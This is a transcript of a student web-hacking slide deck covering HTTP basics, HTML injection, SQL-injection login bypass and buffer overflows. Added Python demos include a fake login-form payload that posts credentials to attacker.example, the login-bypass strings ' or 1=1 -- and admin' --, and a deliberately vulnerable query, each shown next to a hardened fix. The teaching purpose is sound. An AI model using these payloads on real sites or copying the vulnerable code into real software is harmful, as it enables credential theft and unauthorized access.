Web Hacking Series Part 1
Transcript of Web Hacking Series Part 1
~ Aditya Kamat
BMS College of Engineering
WEB HACKING SERIES PART-1
WEBSITE?
• It is a collection of related web pages.
• Web pages consist of text or multimedia content.
• Can have a domain name.
• Can be accessible over the internet or LAN.
• URL(Uniform Resource Locator) is used to identify the site.
PROTOCOL?
• Set of rules which are used for communication.
• We will look at:
• IP (Internet Protocol)
• HTTP (Hyper Text Transfer Protocol)
• HTTPS (Hyper Text Transfer Protocol Secure)
IP (INTERNET PROTOCOL)
• It has two versions:
• IPv4 (32 bits)
• IPv6 (128 bits)
• IPv4 is the most used one currently.
• An IP address is assigned to each host on a network and must be unique within that network.
• Example: 192.168.0.1, 110.211.2.65
PUBLIC IP ADDRESS
• It is the address the ISP (Internet Service Provider) assigns to a connection; it is what the rest of the internet sees.
• At any given moment it is unique on the internet, but it is not tied to a single client: all devices behind a NAT router share one public address, and ISPs reassign dynamic addresses over time.
• IANA (Internet Assigned Numbers Authority) allocates address blocks to the Regional Internet Registries, which allocate ranges to ISPs, which in turn assign addresses to their customers. This hierarchy is what keeps two public addresses from colliding.
PRIVATE IP ADDRESS
• These are assigned by the router on the local network (usually via DHCP) and are not routable on the public internet.
• They are used between devices on the same local network; when traffic leaves the network the router translates them to its single public address (NAT).
• All devices on the same network have different private IP addresses but share the same public address.
• The private ranges (RFC 1918) are 10.0.0.0/8, 172.16.0.0/12 (172.16.x.x through 172.31.x.x) and 192.168.0.0/16. "Starts with 10, 172 or 192" is only a rough rule of thumb: most 172.x.x.x and 192.x.x.x addresses are public.
PUBLIC VS PRIVATE IP ADDRESS
Source: http://bharath-marrivada.blogspot.in/
HTTP (HYPER TEXT TRANSFER PROTOCOL)
• Versions in common use:
• HTTP/1.0
• HTTP/1.1 (still the most widely deployed)
• HTTP/2
• HTTP/3 (over QUIC) has since been standardized; the plaintext request and response framing shown in this series is that of HTTP/1.x.
• HTTP functions as a request–response protocol in the client–server computing model.
• The client submits an HTTP request message to the server.
• The server, which provides resources such as HTML files and other content, or performs other functions on behalf of the client, returns a response message to the client.
STATUS CODE
• 200 OK
• 301 MOVED PERMANENTLY
• 302 FOUND (temporary redirect)
• 304 NOT MODIFIED (reply to a conditional request; tells a browser or proxy cache that its stored copy is still valid)
• 400 BAD REQUEST (malformed request; a client-side error)
• 401 UNAUTHORIZED (despite the name, this means "not authenticated": credentials are missing or wrong)
• 403 FORBIDDEN (the server understood who you are and still refuses; useful to distinguish from 401 when mapping an application)
• 404 NOT FOUND
Source: https://en.wikipedia.org/wiki/List_of_HTTP_status_codes
HTTP METHODS
• GET
• HEAD (same as GET, but the server returns only the headers)
• POST
• PUT
• DELETE
• TRACE (echoes the request back to the client, including cookies and authorization headers; it should be disabled on production servers)
• OPTIONS also exists and is a cheap way to discover which of these methods a server will accept.
GET METHOD
• It is used to retrieve a resource from the web server; parameters travel in the URL query string, so they end up in browser history, proxy logs and server logs.
• A conditional GET (with an If-Modified-Since or If-None-Match header) is used by web caches to check whether the data has changed; the server answers 304 NOT MODIFIED if it has not.
POST METHOD
• Parameters are passed in the message body, not in the URL.
• This keeps them out of URLs, browser history and most logs, but it is not "more secure" than GET: over plain HTTP the body is just as visible to anyone on the path, and the method offers no protection against injection attacks. Confidentiality comes from HTTPS, not from the choice of method.
Source: studytonight.com
SOCKETS
• A socket is the combination of an IP address and a port number. (This is the TCP socket, not the WebSocket protocol, which is a separate browser protocol layered on top of HTTP.)
• The server tells connections apart by the pair of sockets at both ends: source IP, source port, destination IP and destination port.
• The server listens on one socket (for example port 80); each accepted client connection gets its own connected socket through which the two sides communicate.
• To serve many clients at once the server handles each connection in a separate thread or process, or with an event loop.
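To make the request/response model, the status codes and the socket material above concrete, here is an added example (my own code, not part of the original slides): a tiny HTTP server running in a thread, and a client that speaks raw HTTP/1.1 over a TCP socket and parses the status line and headers itself. The served page, the ETag value "v1", the path /nope and the use of 405 for a refused TRACE are all constructed for this demo.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed content for the demo server (not from the original slides).
RESOURCES = {"/": b"<h1>hello</h1>"}
ETAG = '"v1"'


class DemoHandler(BaseHTTPRequestHandler):
    """Tiny server: answers GET and HEAD, honours conditional GET, refuses TRACE."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _send(self, status, body=b"", extra=None, include_body=True):
        self.send_response(status)
        for name, value in (extra or {}).items():
            self.send_header(name, value)
        if status != 304:  # a 304 carries no body, so no length header
            self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if include_body and body:
            self.wfile.write(body)

    def _serve(self, include_body):
        body = RESOURCES.get(self.path)
        if body is None:
            self._send(404)  # unknown path
        elif self.headers.get("If-None-Match") == ETAG:
            self._send(304, extra={"ETag": ETAG}, include_body=False)  # cached copy still valid
        else:
            self._send(200, body, {"Content-Type": "text/html", "ETag": ETAG}, include_body)

    def do_GET(self):
        self._serve(include_body=True)

    def do_HEAD(self):
        self._serve(include_body=False)  # same headers as GET, no body

    def do_TRACE(self):
        # TRACE would echo the request (cookies included) back to the client; refuse it.
        self._send(405, extra={"Allow": "GET, HEAD"})


def raw_request(port, request):
    """Send one raw HTTP request over a TCP socket and parse the reply."""
    with socket.create_connection(("127.0.0.1", port)) as sock:
        sock.sendall(request.encode("ascii"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # server closed the connection: the response is complete
                break
            chunks.append(data)
    head, _, body = b"".join(chunks).partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    status = int(status_line.split(" ", 2)[1])  # "HTTP/1.0 200 OK" -> 200
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def start_server():
    server = HTTPServer(("127.0.0.1", 0), DemoHandler)  # port 0: pick any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def demo():
    """Run the exchanges the slides describe; returns {name: (status, headers, body)}."""
    server, port = start_server()
    common = "Host: localhost\r\nConnection: close\r\n"
    requests = {
        "get": f"GET / HTTP/1.1\r\n{common}\r\n",
        "head": f"HEAD / HTTP/1.1\r\n{common}\r\n",
        "conditional": f"GET / HTTP/1.1\r\n{common}If-None-Match: {ETAG}\r\n\r\n",
        "missing": f"GET /nope HTTP/1.1\r\n{common}\r\n",
        "trace": f"TRACE / HTTP/1.1\r\n{common}\r\n",
    }
    try:
        return {name: raw_request(port, req) for name, req in requests.items()}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for name, (status, headers, body) in demo().items():
        print(f"{name:12s} -> {status} etag={headers.get('etag')} body={body!r}")
```

Running it shows one exchange per slide bullet: GET returns 200 with the body, HEAD returns the same headers (including Content-Length) with no body, a GET carrying the ETag from the first reply gets 304 with no body, an unknown path gets 404, and TRACE is refused with 405 and an Allow header listing the methods the server does accept. The client reads until the server closes the connection, which is the HTTP/1.0-style behaviour this server uses; with keep-alive you would instead read exactly Content-Length bytes.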
HTTPS
• HTTP over TLS (Transport Layer Security, the successor of SSL, Secure Sockets Layer; every SSL version is now deprecated).
• Default port number 443.
• Provides confidentiality, integrity and server authentication for the whole HTTP exchange.
• Many websites used to enable it only on pages carrying secret data (payment info). That is no longer considered acceptable: on a mixed HTTP/HTTPS site an attacker on the path can read or tamper with the plaintext pages and steal the session cookie, so HTTPS is now expected site-wide.
• The TLS handshake adds some latency and CPU cost, but on modern hardware the difference from plain HTTP/1.1 is small, and browsers only offer HTTP/2 over TLS.
ENOUGH OF THEORY, LET US START ATTACKING ;)
VULNERABILITIES WE WILL BE LOOKING AT:-
• HTML injection.
• SQL injection to bypass authentication.
• Buffer overflow attack.
HTML INJECTION
• It occurs when text a user typed into a form is written back into the page without encoding, so HTML tags in the input are rendered as markup instead of being shown as text.
• The same happens when the input arrives as a URL parameter (for example ?name=...) and is reflected into the page.
• The attacker crafts the input so that the page displays content of their choosing.
• A common goal is to inject a fake login form that posts to the attacker's server in order to steal account credentials, as we will see in the demo.
A FEW HTML TAGS
• <b> - To make the text bold.
• <i> - To italicize the text.
• <form> - To create a form; its action attribute says where the browser sends the submitted data.
• <input> - To create each element of the form.
• <table> - To create a table. <tr> creates a row and <td> a cell within that row.
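The credential-stealing injection described above, as an added example in Python (my own code, not from the original slides): a greeting page that pastes the user's name into the markup is compared with one that HTML-encodes it, and a small parser checks whether the injected <form> really becomes an element the browser would submit. The template, the payload and the placeholder host attacker.example are constructed for this demo.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

# Constructed page template; {name} is filled from user input.
TEMPLATE = "<html><body><p>Welcome back, {name}!</p></body></html>"


def render_unsafe(name):
    """Vulnerable: the raw string is pasted straight into the markup."""
    return TEMPLATE.format(name=name)


def render_safe(name):
    """Hardened: encode <, >, &, ' and " so the browser shows them as text."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


def url_for(name):
    """The input can also arrive as a URL parameter, e.g. a link the victim clicks."""
    return "/greet?name=" + quote(name, safe="")


def name_from_url(url):
    """Server side: pull the name parameter back out of the request URL."""
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


class FormFinder(HTMLParser):
    """Collects the <form> elements a browser would build from the page."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.forms.append(dict(attrs))


def forms_in(page):
    finder = FormFinder()
    finder.feed(page)
    return finder.forms


# Constructed payload: closes the open <p>, then plants a fake login form whose
# action points at an attacker-controlled host (attacker.example is a placeholder).
PAYLOAD = (
    '</p><form action="https://attacker.example/collect" method="post">'
    "Session expired, please sign in again: "
    '<input name="user"><input name="pass" type="password">'
    '<input type="submit" value="Login"></form><p>'
)

if __name__ == "__main__":
    name = name_from_url(url_for(PAYLOAD))  # payload delivered via the URL
    print("unsafe page forms:", forms_in(render_unsafe(name)))  # the fake form exists
    print("safe page forms:  ", forms_in(render_safe(name)))    # nothing but text
```

In the unsafe rendering the parser finds a form whose action is the attacker's host, which is exactly what a victim's browser would submit their password to; in the safe rendering the same bytes appear as literal text (&lt;form ...) and no element is created. Encoding at output time, not input validation, is the fix, and it must use the encoding of the context the data lands in (here an HTML text node).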
SQL INJECTION TO BYPASS AUTHENTICATION
• The main intention here is to log in without knowing a valid username and password.
• The login code builds its query by pasting the submitted text into the SQL string. A single or double quote closes the string literal early, so whatever follows it is parsed as SQL and executed; a comment sequence (-- in most databases) discards the rest of the original query.
Source : learn.digilentic.com
QUERY / STATEMENT
• ' or 1=1 --
• Entered as the username, it turns WHERE username = '...' AND password = '...' into WHERE username = '' or 1=1 with the rest commented out. The condition is true for every row, even though no real username or password was supplied, because the right side of the OR is always true.
• Hence the application logs us in as the first user the query returns, which is often the administrator account; admin' -- as the username selects that specific account instead.
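The bypass above, worked through in Python against an in-memory SQLite table as an added example (my own code, not from the original slides). The vulnerable login pastes the input into the SQL text exactly as the slide describes; the hardened version next to it binds parameters so the same input is only ever compared as data. The table contents and the plaintext passwords are constructed for the demo (a real system stores salted password hashes).

```python
import sqlite3


def make_db():
    """Constructed sample accounts in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cr3t"), ("alice", "wonderland")],
    )
    return conn


def build_query(username, password):
    """The SQL the vulnerable login actually runs: input pasted into the text."""
    return (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: quotes in the input end the string literal early."""
    row = conn.execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Hardened: bound parameters are never parsed as SQL, whatever they contain."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    for user, pw in [("' or 1=1 --", "anything"), ("admin' --", ""), ("alice", "wrong")]:
        print(build_query(user, pw))
        print("  vulnerable ->", login_vulnerable(conn, user, pw))
        print("  safe       ->", login_safe(conn, user, pw))
```

With the slide's payload as the username the vulnerable query becomes SELECT username FROM users WHERE username = '' or 1=1 --' AND password = 'anything': everything after -- is a comment, the WHERE clause matches every row, and fetchone() hands back the first user, admin. The parameterized version returns nothing for the same input. Note that the comment sequence must be two ASCII hyphens; MySQL additionally requires a space after them (-- ) or the # character.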
BUFFER OVERFLOW
• It is a memory-corruption attack on the server software or on native code it runs, such as a CGI program or an image-parsing library.
• If the input length is not validated, data written into a fixed-size buffer spills past its end and overwrites adjacent memory.
• The simplest effect is a crash, which denies service; the attack is not about "filling up" the server's memory with junk, and it does not exhaust resources the way a flood does.
• With a carefully crafted input the overwritten memory can include a saved return address, letting the attacker redirect execution to code of their own choosing on the server.
THANK YOU